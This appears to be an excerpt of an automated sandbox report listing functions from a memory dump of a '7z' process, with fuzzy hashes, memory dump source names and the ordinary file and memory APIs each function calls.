                                                                                                                                                                                                                                                  • Instruction ID: c3fdc6a3fa7775cf0451a75e3f213fc2386047b36d4371620bf53cc53693deb9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd356717b46294ebbf87faeea91df8213fb96c8abb4be4db24926ca1e4725612
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE41AD23254B8491CB60EF26E8503AE6764FBC6B84F889132EB8E47729DF78C595C354
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                                  • Instruction ID: 52a84e4f4adbb2b013ff403ba64e3ef5aaa0b078e315478308c34f951a3bf3b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6311972224B41C6EB10DF28F9A439A7775F784BB4F504226E6A9537B6DB3CC885CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$fputsmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4106585527-0
                                                                                                                                                                                                                                                  • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                                  • Instruction ID: 7316ee7104aba85a4e0ca7c374580417bc3852bce845dc20f1bdb879ef4417a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B401486331844091DE20AB25E85165E6721EBD5BF4F44D321FE6F876F9DE2CC686C704
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFilefree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1936811914-0
                                                                                                                                                                                                                                                  • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                                  • Instruction ID: 358c3ec10f022044d2aeb762319bfad29991c51428fb5f69bb29424b4b3556ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01DB23308A0182D6309B25E99037E5768ABC97F4F58C321DE7D877A5CF28CD879711
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFilefree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1936811914-0
                                                                                                                                                                                                                                                  • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                                  • Instruction ID: 208225795b25e0f074298446e310589f60a16a56d7d467a655e4536af3150752
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0312720860085CA30AB75AD9037D6324AFCA7F4F548720EA7D867F5DF14C9868700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                                  • Instruction ID: b3c1642195fd07a1cb167519e75db4a54b287509be086cdf9ea5ed7d394fb983
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50514A73604A8097CE30DF1AE88029DB364F7C9BD4F408226EB9E47B59DF28D5A5CB54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 2703c9f3fbddb521d8c4c51cfedb35860992798216a6655cd283f4a4fda484df
                                                                                                                                                                                                                                                  • Instruction ID: 2b543bcef068ab197ea595377ecf9ca5ab7201c352a7ad3763e94ea9fec5d3ac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2703c9f3fbddb521d8c4c51cfedb35860992798216a6655cd283f4a4fda484df
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 663184637156848ACF30DF1EE88051E6765F7D97A4B988239FF9E47758EA38C841C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                                  • Instruction ID: 6b0a0963ab9aec696084b1f1a232dd3e207cc69bb01a9233af132e5fe055f028
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59118A2321954052DE10EB65E5513AA9761EBD13F0F509321BBAE876FADE18C94BCB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3934437811-0
                                                                                                                                                                                                                                                  • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                                  • Instruction ID: ac0495b9202b3853fbf0c76d8cae702f38cf1b8878ecf0dfc4719956ef9207c2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 311181637057808BCA209F25E99039AA710FB967E4F488315AFAD077A9DF68C54AC710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                                  • Instruction ID: a0622799a1281bcfc9688b99dd7013267cff14c12bf0f275af010c277727f95e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91019B2321C64481CE20EB26F55536E9721FBC67E4F44D2217EBE576BADF28C54AC704
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009789D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009789EA
                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE ref: 00978D51
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 00978DA4
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00978DB2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 210839660-0
                                                                                                                                                                                                                                                  • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                                  • Instruction ID: cbdb2a13399bd88e9d51b4c13f9dc0819e9a2a3979c309658cc0ac9721374e63
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE219D331446819AC7709F19B85575A6B28B3967F4F548321EFB943BE4DF38C8968B00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00973274: memmove.MSVCRT ref: 009732AC
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2D41
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2DCF
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B2DFF
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1158454270-0
                                                                                                                                                                                                                                                  • Opcode ID: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
                                                                                                                                                                                                                                                  • Instruction ID: f465e58cc5111c820cc9fbe482779f82a432fd586cd5d580444ad0137cde9a9e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 062130A2714A0181CF30EF26E86136E6361EBD5BF4F48D221EA5F4B7A9DE2CC545C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3796167841-0
                                                                                                                                                                                                                                                  • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                                  • Instruction ID: be1d98e73a16b9c9a00677095d530252726f38b7e7f6d4d807b846e72e95cf55
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E95101B3301B14A7DF25CE3AD6407A923A4FB49794F04952AEF0E87B50DB39D8A6C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputc
                                                                                                                                                                                                                                                  • String ID: Kernel
                                                                                                                                                                                                                                                  • API String ID: 1992160199-1736990243
                                                                                                                                                                                                                                                  • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                                  • Instruction ID: 700cca4380b09af1280e41b27d6c37aeec1dea90c7d333cba31dd9dd7e5267cd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDC09295BA0A0882EF181BBBFC953292222D75DFE1F186030CE1D0B391DA2CD4E68721
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                    • Part of subcall function 00972B04: _CxxThrowException.MSVCRT ref: 00972B2D
                                                                                                                                                                                                                                                    • Part of subcall function 00972B04: free.MSVCRT ref: 00972B44
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3104931167-0
                                                                                                                                                                                                                                                  • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                                  • Instruction ID: 9f581b4b1fc1f34d7e66438e833480b79bd45a9f59145d4b5622e1c241ecb10e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4701C0737006909AE705DF6BEA8479E3724F769BA4F088022DF0807751DF74D8AAC310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,00000003,?,00978E1D), ref: 00978A99
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000003,?,00978E1D), ref: 00978AA6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                  • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                                  • Instruction ID: 51eb5a417bc356698c604dd8eb590e49785be58a3027ac38f30559cdfcd9d80e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72F0FC63F417C083DF298B69D85C75A3759E759798FAC8422CA0C43750DF29C883C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputcfputsfree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2822829076-0
                                                                                                                                                                                                                                                  • Opcode ID: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
                                                                                                                                                                                                                                                  • Instruction ID: 37dc1719e6f9e15cd4022bad4618c875fd41d747a876cd5cfdc44304c2ecc762
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF0126321494480CA30DF25E95535E6320E7C9BF8F588321EE6D477E9DF28C586C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 009A404D
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 009A4087
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: free.MSVCRT ref: 00973431
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C
